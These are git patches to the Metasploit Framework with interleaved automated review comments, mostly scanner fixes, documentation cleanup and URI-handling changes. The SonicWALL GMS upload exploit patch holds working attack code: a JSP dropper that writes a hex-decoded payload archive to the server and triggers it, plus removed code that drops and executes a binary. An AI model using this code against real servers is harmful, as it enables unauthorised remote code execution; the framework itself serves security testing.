vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") - end - else - return - end - - rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") - return - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") - return - rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") - return - end - - - -end From 01b7e3554ee6575fd561d91789fd93ce5bdf089d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 25 Jan 2013 22:05:09 +0100 Subject: [PATCH 171/421] fix issue found by newpid0 --- .../auxiliary/scanner/http/joomla_version.rb | 52 +++++++++---------- 1 file changed, 25 insertions(+), 27 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb index 5ccdfe89d763..f0ebb7cbda68 100755 --- a/modules/auxiliary/scanner/http/joomla_version.rb +++ b/modules/auxiliary/scanner/http/joomla_version.rb @@ -40,9 +40,7 @@ def os_fingerprint(response) end case response.headers['Server'] - when /Win32/ - when /\(Windows/ - when /IIS/ + when /Win32/, /\(Windows/, /IIS/ os = "Windows" when /Apache\// os = "*Nix" 
@@ -57,36 +55,36 @@ def fingerprint(response) when /<version.*\/?>(.+)<\/version\/?>/i v = $1 out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}" - when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ - when /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ - when /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ - when /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ - when /20196 2011\-01\-09 02\:40\:25Z ian/ + when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/, + /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/, + /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/, + /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/, + /20196 2011\-01\-09 02\:40\:25Z ian/ out = "1.6" - when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / - when /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ - when /22183 2011\-09\-30 09\:04\:32Z infograf768/ - when /21660 2011\-06\-23 13\:25\:32Z infograf768/ + when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley /, + /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/, + /22183 2011\-09\-30 09\:04\:32Z infograf768/, + /21660 2011\-06\-23 13\:25\:32Z infograf768/ out = "1.7" - when /Joomla! 1.5/ - when /MooTools\=\{version\:\'1\.12\'\}/ - when /11391 2009\-01\-04 13\:35\:50Z ian/ + when /Joomla! 
1.5/, + /MooTools\=\{version\:\'1\.12\'\}/, + /11391 2009\-01\-04 13\:35\:50Z ian/ out = "1.5" - when /Copyright \(C\) 2005 \- 2012 Open Source Matters/ - when /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ + when /Copyright \(C\) 2005 \- 2012 Open Source Matters/, + /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ out = "2.5" when /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/ out = $1.split(/,/)[0] - when /(Copyright \(C\) 2005 - 200(6|7))/ - when /47 2005\-09\-15 02\:55\:27Z rhuk/ - when /423 2005\-10\-09 18\:23\:50Z stingrey/ - when /1005 2005\-11\-13 17\:33\:59Z stingrey/ - when /1570 2005\-12\-29 05\:53\:33Z eddieajau/ - when /2368 2006\-02\-14 17\:40\:02Z stingrey/ - when /4085 2006\-06\-21 16\:03\:54Z stingrey/ - when /4756 2006\-08\-25 16\:07\:11Z stingrey/ - when /5973 2006\-12\-11 01\:26\:33Z robs/ - when /5975 2006\-12\-11 01\:26\:33Z robs/ + when /(Copyright \(C\) 2005 - 200(6|7))/, + /47 2005\-09\-15 02\:55\:27Z rhuk/, + /423 2005\-10\-09 18\:23\:50Z stingrey/, + /1005 2005\-11\-13 17\:33\:59Z stingrey/, + /1570 2005\-12\-29 05\:53\:33Z eddieajau/, + /2368 2006\-02\-14 17\:40\:02Z stingrey/, + /4085 2006\-06\-21 16\:03\:54Z stingrey/, + /4756 2006\-08\-25 16\:07\:11Z stingrey/, + /5973 2006\-12\-11 01\:26\:33Z robs/, + /5975 2006\-12\-11 01\:26\:33Z robs/ out = "1.0" else out = 'Unknown Joomla' From b4eed328a7d7d0cc821e226993529db80c6dcb7e Mon Sep 17 00:00:00 2001 From: lmercer <lmercer@mit.edu> Date: Sat, 26 Jan 2013 01:26:18 -0500 Subject: [PATCH 172/421] MySQL login scanner unhandled exception --- modules/auxiliary/scanner/mysql/mysql_login.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index be8b70e14fc4..154c643877f7 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb 
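Review bot: Two of the merged patterns in `fingerprint` leave `.` unescaped, `/Joomla! 1.5/` and `/MooTools.More\=\{version\:\"1\.4\.0\.1\"/`, so they accept any character in that position while the neighbouring patterns escape it; `/Joomla! 1\.5/` and `/MooTools\.More\=\{version\:\"1\.4\.0\.1\"/` would make them literal like the rest. In the 1.6 branch the last pattern, `/20196 2011\-01\-09 02\:40\:25Z ian/`, already matches everything the `system\.css 20196 ...` and `en-GB\.ini 20196 ...` patterns match, so those two are redundant. `fingerprint` starts and ends outside the hunk.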
@@ -67,6 +67,7 @@ def mysql_version_check(target="5.0.67") # Oldest the library claims. end offset = 0 l0, l1, l2 = data[offset, 3].unpack('CCC') + return false if data.length < 3 length = l0 | (l1 << 8) | (l2 << 16) # Read a bad amount of data return if length != (data.length - 4) From 49aac302e6acf495dba9a024bd1ef13870080c84 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Sat, 26 Jan 2013 22:57:01 -0600 Subject: [PATCH 173/421] normalize_uri() breaks URI parsing Please see: http://dev.metasploit.com/redmine/issues/7727 --- modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index 0895037634b6..d9c8e87e8dbc 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -80,7 +80,7 @@ def check def exploit peer = "#{rhost}:#{rport}" uri = normalize_uri(target_uri.path) - uri << '/' if target_uri.path[-1,1] != '/' + uri << '/' if uri[-1,1] != '/' # Trigger the command execution bug res = send_request_cgi({ From 169f91159e00044dd7f475b5520682c3911371c6 Mon Sep 17 00:00:00 2001 From: rogueclown <rogueclown@rogueclown.net> Date: Sun, 27 Jan 2013 21:18:49 -0600 Subject: [PATCH 174/421] added 'from' PID to meterpreter migrate message --- lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index cb6aca1ca6e3..8005b3b66d0c 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb 
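Review bot: The new guard `return false if data.length < 3` is placed after `data[offset, 3].unpack('CCC')`, so it cannot protect that line: if `data` is nil (the read that produces it is outside the hunk, so this is an assumption) the slice raises before the guard runs. Moving it above the unpack as `return false if data.nil? or data.length < 3` handles the nil case as well as the short read. The guard returns `false` while the next check uses a bare `return` (nil); one failure value should be chosen for the method so callers do not have to handle both.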
@@ -342,7 +342,8 @@ def cmd_migrate(*args) return end - print_status("Migrating to #{pid}...") + server = client.sys.process.open + print_status("Migrating from #{server.pid} to #{pid}...") # Do this thang. client.core.migrate(pid) From 3fc9b5d636a8ba4b326ab3c77ed5bb2e6f596120 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 00:01:45 -0600 Subject: [PATCH 175/421] Doc cleanup --- lib/msf/core/payload/java.rb | 6 ++-- lib/msf/util/exe.rb | 56 +++++++++++++++++++++++++----------- 2 files changed, 42 insertions(+), 20 deletions(-) diff --git a/lib/msf/core/payload/java.rb b/lib/msf/core/payload/java.rb index 37e563e6eed6..824db13b0865 100644 --- a/lib/msf/core/payload/java.rb +++ b/lib/msf/core/payload/java.rb @@ -66,9 +66,9 @@ def generate_jar(opts={}) # Like #generate_jar, this method is used by stagers to create a war file # as a Rex::Zip::Jar object. # - # +opts+ can include: - # +:app_name+:: the name of the \<servlet-name> attribute in the web.xml. - # Defaults to "NAME" + # @param opts [Hash] + # @option :app_name [String] Name of the \<servlet-name> attribute in the + # web.xml. Defaults to random # def generate_war(opts={}) raise if not respond_to? :config diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index 40f14ed747e9..33a41ca7c3a2 100755 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -1,21 +1,13 @@ # -*- coding: binary -*- -## -# $Id: exe.rb 14286 2011-11-20 01:41:04Z rapid7 $ -## -### -# -# framework-util-exe -# -------------- +module Msf +module Util + # # The class provides methods for creating and encoding executable file # formats for various platforms. It is a replacement for the previous # code in Rex::Text # -### - -module Msf -module Util class EXE require 'rex' 
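Review bot: In the generate_war comment in lib/msf/core/payload/java.rb the new tag `# @option :app_name [String]` leaves out the name of the hash parameter, which YARD expects before the key. It should read `# @option opts :app_name [String] Name of the \<servlet-name> attribute in the web.xml.`, matching the form the to_war comment in lib/msf/util/exe.rb uses in this same commit. The text also changes the documented default from "NAME" to random; the method body is outside the hunk, so that is worth confirming against the code.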
@@ -609,6 +601,7 @@ def self.to_osx_x64_macho(framework, code, opts={}) end # Create an ELF executable containing the payload provided in +code+ + # # For the default template, this method just appends the payload, checks if # the template is 32 or 64 bit and adjusts the offsets accordingly # For user-provided templates, modifies the header to mark all executable @@ -1187,8 +1180,9 @@ def self.to_win32pe_aspx(framework, code, opts={}) # Creates a jar file that drops the provided +exe+ into a random file name # in the system's temp dir and executes it. # - # See also: +Msf::Core::Payload::Java+ + # @see Msf::Payload::Java # + # @return [Rex::Zip::Jar] def self.to_jar(exe, opts={}) spawn = opts[:spawn] || 2 exe_name = Rex::Text.rand_text_alpha(8) + ".exe" 
@@ -1205,8 +1199,30 @@ def self.to_jar(exe, opts={}) zip end - # Creates a Web Archive (WAR) file from the provided jsp code. Additional options - # can be provided via the "opts" hash. + # Creates a Web Archive (WAR) file from the provided jsp code. + # + # On Tomcat, WAR files will be deployed into a directory with the same name + # as the archive, e.g. +foo.war+ will be extracted into +foo/+. If the + # server is in a default configuration, deoployment will happen + # automatically. See + # {http://tomcat.apache.org/tomcat-5.5-doc/config/host.html the Tomcat + # documentation} for a description of how this works. + # + # @param jsp_raw [String] JSP code to be added in a file called +jsp_name+ + # in the archive. This will be compiled by the victim servlet container + # (e.g., Tomcat) and act as the main function for the servlet. + # @param opts [Hash] + # @option opts :jsp_name [String] Name of the <jsp-file> in the archive + # _without the .jsp extension_. Defaults to random. + # @option opts :app_name [String] Name of the app to put in the <servlet-name> + # tag. Mostly irrelevant, except as an identifier in web.xml. Defaults to + # random. + # @option opts :extra_files [Array<String,String>] Additional files to add + # to the archive. First elment is filename, second is data + # + # @todo Refactor to return a {Rex::Zip::Archive} or {Rex::Zip::Jar} + # + # @return [String] def self.to_war(jsp_raw, opts={}) jsp_name = opts[:jsp_name] jsp_name ||= Rex::Text.rand_text_alpha_lower(rand(8)+8) 
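Review bot: The new to_war comment contains two typos that will end up in the generated API docs: `deoployment` should be `deployment` and `elment` should be `element`. The `:extra_files` type `Array<String,String>` reads in YARD as an array whose members are strings, while the description says each entry is a filename/data pair; something like `Array<Array(String, String)>` would match the description. The method body continues outside the hunk.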
@@ -1247,9 +1263,15 @@ def self.to_war(jsp_raw, opts={}) return zip.pack end - # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload. - # The jsp page converts the hexdump back to a normal .exe file and places it in - # the temp directory. The payload .exe file is then executed. + # Creates a Web Archive (WAR) file containing a jsp page and hexdump of a + # payload. The jsp page converts the hexdump back to a normal binary file + # and places it in the temp directory. The payload file is then executed. + # + # @see to_war + # @param exe [String] Executable to drop and run. + # @param opts (see to_war) + # @option opts (see to_war) + # @return (see to_war) def self.to_jsp_war(exe, opts={}) # begin <payload>.jsp From 044fefd02aab9117238b698bca48ec1b1f2f523d Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 28 Jan 2013 00:02:26 -0600 Subject: [PATCH 176/421] Initial support for Java target Still some debugging junk, needs some more love. --- .../multi/http/sonicwall_gms_upload.rb | 168 +++++++----------- 1 file changed, 60 insertions(+), 108 deletions(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 4abf1ce64523..175e676f4aaf 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -5,10 +5,13 @@ # http://metasploit.com/ ## +load 'lib/msf/core/payload/java.rb' +load 'lib/msf/core/encoded_payload.rb' +load 'lib/msf/util/exe.rb' require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = GoodRanking + Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -46,6 +49,12 @@ def initialize(info = {}) 'Platform' => [ 'win', 'linux' ], 'Targets' => [ + [ 'SonicWALL GMS 6.0 Viewpoint / Java Universal', + { + 'Arch' => ARCH_JAVA, + 'Platform' => 'java' + } + ], [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', { 'Arch' => ARCH_X86, 
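Review bot: The three `load 'lib/msf/...'` lines added at the top of sonicwall_gms_upload.rb look like development leftovers. Their paths are relative to the current working directory, so the module only loads when the framework is started from its root, and each `load` re-evaluates framework files that are already required. They should be removed before merge, leaving `require 'msf/core'`. The same hunk raises `Rank` to `ExcellentRanking` while the commit message says the code still contains debugging junk; the rank change is better held back until the new code path has been cleaned up and tested.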
@@ -70,82 +79,6 @@ def initialize(info = {}) end - def on_new_session - # on_new_session will force stdapi to load (for Linux meterpreter) - end - - - def generate_jsp - var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) - var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) - var_data = Rex::Text.rand_text_alpha(rand(8)+8) - var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) - var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) - var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) - var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) - var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) - var_counter = Rex::Text.rand_text_alpha(rand(8)+8) - var_char1 = Rex::Text.rand_text_alpha(rand(8)+8) - var_char2 = Rex::Text.rand_text_alpha(rand(8)+8) - var_comb = Rex::Text.rand_text_alpha(rand(8)+8) - var_exe = Rex::Text.rand_text_alpha(rand(8)+8) - @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) - var_proc = Rex::Text.rand_text_alpha(rand(8)+8) - var_fperm = Rex::Text.rand_text_alpha(rand(8)+8) - var_fdel = Rex::Text.rand_text_alpha(rand(8)+8) - - jspraw = "<%@ page import=\"java.io.*\" %>\n" - jspraw << "<%\n" - jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n" - jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" - jspraw << "String #{var_data} = \"\";\n" - - jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" - jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" - jspraw << "}\n" - - jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" - jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" - - jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n" - jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" - jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" - jspraw << "#{var_inputstream}.close();\n" - - jspraw << "byte[] 
#{var_bytes} = new byte[#{var_numbytes}/2];\n" - jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" - jspraw << "{\n" - jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" - jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" - jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" - jspraw << "#{var_comb} <<= 4;\n" - jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" - jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" - jspraw << "}\n" - - jspraw << "#{var_outputstream}.write(#{var_bytes});\n" - jspraw << "#{var_outputstream}.close();\n" - - jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n" - jspraw << "String[] #{var_fperm} = new String[3];\n" - jspraw << "#{var_fperm}[0] = \"chmod\";\n" - jspraw << "#{var_fperm}[1] = \"+x\";\n" - jspraw << "#{var_fperm}[2] = #{var_exepath};\n" - jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n" - jspraw << "if (#{var_proc}.waitFor() == 0) {\n" - jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" - jspraw << "}\n" - # Linux and other UNICES allow removing files while they are in use... - jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n" - jspraw << "} else {\n" - # Windows does not .. - jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" - jspraw << "}\n" - - jspraw << "%>\n" - return jspraw - end - def get_install_path res = send_request_cgi( { @@ -195,6 +128,11 @@ def upload_file(location, filename, contents) }, 'connection' => 'TE, close' }) + if target['Platform'] == "win" + register_files_for_cleanup("#{location}\\#{filename}") + else + register_files_for_cleanup("#{location}/#{filename}") + end if res and res.code == 200 and res.body.empty? return true 
@@ -236,44 +174,58 @@ def exploit @location = "#{install_path}webapps\\appliance\\" end + # Generate the WAR containing the EXE containing the payload + jsp_name = "index" + app_base = rand_text_alphanumeric(4+rand(32-4)) + + war = payload.encoded_war({ + :app_name => app_base, + :jsp_name => jsp_name, + :arch => target.arch, + :platform => target.platform + }).to_s + File.open("foo.war", "wb") { |fd| fd.write(war) } + + dropper = jsp_bin_dopper(war, "#{install_path}webapps/foo.war") + upload_file("#{install_path}webapps/appliance", "foo-dropper.jsp", dropper) + send_request_cgi( + { + 'uri' => normalize_uri("#{@uri}appliance/foo-dropper.jsp"), + 'method' => 'GET' + }) - # Upload the JSP and the raw payload - @jsp_name = rand_text_alphanumeric(8+rand(8)) - - jspraw = generate_jsp - - # Specify the payload in hex as an extra file.. - payload_hex = payload.encoded_exe.unpack('H*')[0] - - print_status("#{@peer} - Uploading the payload") + send_request_cgi( + { + 'uri' => normalize_uri("#{target_uri.path}/foo/#{app_base}/#{jsp_name}.jsp"), + 'method' => 'GET' + }) + end - if upload_file(@location, "#{@var_hexfile}.txt", payload_hex) - print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt") - else - fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload") - end + def jsp_bin_dopper(bin_data, output_file) + jspraw = %Q|<%@ page import="java.io.*" %>\n| + jspraw << %Q|<%\n| + jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| - print_status("#{@peer} - Uploading the payload") + jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| - if upload_file(@location, "#{@jsp_name}.jsp", jspraw) - print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp") - else - fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp") - end + jspraw << %Q|int numbytes = data.length();\n| - print_status("Triggering payload at 
'#{@uri}#{@jsp_name}.jsp' ...") - res = send_request_cgi( - { - 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", - 'method' => 'GET' - }) + jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| + jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| + jspraw << %Q|{\n| + jspraw << %Q| char char1 = (char) data.charAt(counter);\n| + jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| + jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| + jspraw << %Q| comb <<= 4;\n| + jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| + jspraw << %Q| bytes[counter/2] = (byte)comb;\n| + jspraw << %Q|}\n| - if res and res.code != 200 - print_warning("#{@peer} - Error triggering the payload") - end + jspraw << %Q|outputstream.write(bytes);\n| + jspraw << %Q|outputstream.close();\n| - register_files_for_cleanup("#{@location}#{@var_hexfile}.txt") - register_files_for_cleanup("#{@location}#{@jsp_name}.jsp") + jspraw << %Q|%>\n| + return jspraw end end From fc833ea8df544a884712c7acc3620efdb6d993ba Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Mon, 28 Jan 2013 10:30:59 -0600 Subject: [PATCH 177/421] Catch exceptions and return value --- .../meterpreter/ui/console/command_dispatcher/core.rb | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 8005b3b66d0c..6d8fc9ae3a5d 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb 
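Review bot: `File.open("foo.war", "wb") { |fd| fd.write(war) }` in exploit writes the generated archive into whatever directory the console was started from on every run; it reads as a debugging aid and should be deleted, which is consistent with the commit message admitting leftover debugging code. The new helper is named `jsp_bin_dopper`, presumably meant to be `jsp_bin_dropper`; the definition and its call site both carry the misspelling and should be renamed together. The exploit method starts outside the hunk.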
@@ -342,8 +342,15 @@ def cmd_migrate(*args) return end - server = client.sys.process.open - print_status("Migrating from #{server.pid} to #{pid}...") + begin + server = client.sys.process.open + rescue TimeoutError => e + elog(e.to_s) + rescue RequestError => e + elog(e.to_s) + end + + server ? print_status("Migrating from #{server.pid} to #{pid}...") : print_status("Migrating to #{pid}") # Do this thang. client.core.migrate(pid) From 9a58b7b7320f57c25b97f9c6ac6748d2815d122b Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Mon, 28 Jan 2013 12:10:21 -0600 Subject: [PATCH 178/421] Fix normalize_uri() function This will make sure all the double slashes are gone. Also, the function description is updated to clarify its purpose. --- lib/msf/core/exploit/http/client.rb | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 8ac65d6a0f6d..4d4fd787a602 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -536,15 +536,21 @@ def target_uri end # - # Make sure the URI starts with a slash and doesn't end with one + # Returns a modified version of the URI that: + # 1. Always has a starting slash + # 2. Removes all the double slashes + # 3. Removes the trailing slash # def normalize_uri(str) - + # Makes sure there's a starting slash unless str.to_s[0,1] == "/" str = "/" + str.to_s end - str = str.gsub(/^\/+/, '/') + # Removes all double slashes + str = str.gsub!("//", "/") while str.index("//") + + # Makes sure there's no trailing slash unless str.length == 1 str = str.gsub(/\/+$/, '') end From 690ef85ac1120a2a8e0845fe03c3c5398802b813 Mon Sep 17 00:00:00 2001 
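Review bot: The two rescue clauses added in cmd_migrate have identical bodies and can be a single clause, `rescue TimeoutError, RequestError => e`. The ternary on the following line is used only for its side effects, and its two messages differ in the trailing `...`; building the text first reads better, for example `msg = server ? "Migrating from #{server.pid} to #{pid}..." : "Migrating to #{pid}..."` followed by `print_status(msg)`. cmd_migrate starts and ends outside the hunk.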
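Review bot: In normalize_uri, `str = str.gsub!("//", "/") while str.index("//")` edits the caller's string in place whenever the argument already starts with a slash, because `str` is then still the object that was passed in; a datastore value or `target_uri.path` is changed as a side effect, and a frozen string raises. The line also calls `index` and `gsub!` on the raw argument although the first check uses `str.to_s`, which suggests non-String arguments are expected. One non-mutating pass does the same work: `str = str.to_s.gsub(%r{/{2,}}, '/')`. Collapsing every `//` also rewrites one that appears inside a query string or an embedded URL, so the comment should state that the function is meant for paths only.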
From: sinn3r <msfsinn3r@gmail.com> Date: Mon, 28 Jan 2013 13:19:31 -0600 Subject: [PATCH 179/421] Fix trailing slash problem These modules require the target URI to be a directory path. So if you remove the trailing slash, the web server might return a 301 or 404 instead of 200. Related to: [SeeRM: #7727] --- .../admin/cisco/cisco_secure_acs_bypass.rb | 1 + .../gather/wp_w3_total_cache_hash_extract.rb | 15 ++++++++++++--- modules/auxiliary/scanner/http/glassfish_login.rb | 2 +- modules/auxiliary/scanner/http/vcms_login.rb | 2 +- modules/exploits/linux/http/dolibarr_cmd_exec.rb | 1 + modules/exploits/linux/http/vcms_upload.rb | 1 + .../windows/mysql/scrutinizer_upload_exec.rb | 1 + 7 files changed, 18 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb index 4ddf66ff529a..58aae1ae9841 100644 --- a/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb +++ b/modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb @@ -75,6 +75,7 @@ def run_host(ip) begin uri = normalize_uri(target_uri.path) + uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index 564218eaa1d7..db04a3a2f8fe 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb 
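Review bot: `uri << '/' if uri[-1,1] != '/'` is added verbatim in the cisco_secure_acs_bypass hunk and again in the dolibarr_cmd_exec, vcms_upload and scrutinizer_upload_exec hunks of this commit, each time to undo the trailing-slash removal that normalize_uri has just performed. A small helper next to normalize_uri would keep that rule in one place; inside the modules, `uri << '/' unless uri.end_with?('/')` states the same test more directly. In the scrutinizer hunk the context line passes `target_uri.host` to normalize_uri rather than a path, which looks unintended and is worth checking while that line is being touched.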
@@ -55,9 +55,17 @@ def wordpress_url # Call the User site, so the db statement will be cached def cache_user_info(user_id) - user_url = normalize_uri("/#{wordpress_url}?author=#{user_id}") + user_url = normalize_uri(wordpress_url) begin - send_request_cgi({ "uri" => user_url, "method" => "GET" }) + send_request_cgi( + { + "uri" => user_url, + "method" => "GET", + "vars_get" => { + "author" => user_id + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout vprint_error("Unable to connect to #{url}") return nil @@ -83,7 +91,8 @@ def run_host(ip) key="w3tc_#{host}_#{site_id}_sql_#{query_md5}" key_md5 = ::Rex::Text.md5(key) hash_path = "/#{key_md5[0,1]}/#{key_md5[1,1]}/#{key_md5[2,1]}/#{key_md5}" - url = normalize_uri("/#{wordpress_url}#{datastore["WP_CONTENT_DIR"]}/w3tc/dbcache#{hash_path}") + url = normalize_uri("/#{wordpress_url}#{datastore["WP_CONTENT_DIR"]}/w3tc/dbcache") + uri << hash_path result = nil begin diff --git a/modules/auxiliary/scanner/http/glassfish_login.rb b/modules/auxiliary/scanner/http/glassfish_login.rb index 7f698f9bff79..c7c18d50e771 100644 --- a/modules/auxiliary/scanner/http/glassfish_login.rb +++ b/modules/auxiliary/scanner/http/glassfish_login.rb @@ -218,7 +218,7 @@ def run_host(ip) #Get GlassFish version edition, version, banner = get_version(res) - path = normalize_uri(datastore['PATH']) + path = normalize_uri(target_uri) target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}" print_status("#{target_url} - GlassFish - Attempting authentication") diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 740a9121608f..7afdc7e61d1d 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb 
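Review bot: In the run_host hunk of wp_w3_total_cache_hash_extract.rb the base is assigned to `url`, but the next added line appends to a different name, `uri << hash_path`. No `uri` is assigned in the visible lines, so unless it is defined earlier in run_host this raises NameError, and either way `url` is left without the hash path; the line should be `url << hash_path`. The context line `vprint_error("Unable to connect to #{url}")` in cache_user_info likewise refers to `url` where the local is `user_url`, which is worth fixing in the same pass. Both methods continue outside their hunks.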
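Review bot: In the glassfish_login hunk, `path = normalize_uri(target_uri)` passes the URI object rather than its path; normalize_uri operates on strings, so this should be `path = normalize_uri(target_uri.path)`. The next context line builds `"http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"`, and since the normalized path already begins with a slash, the printed URL gets a doubled slash; dropping the literal `/` before the interpolation fixes the message. run_host continues outside the hunk.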
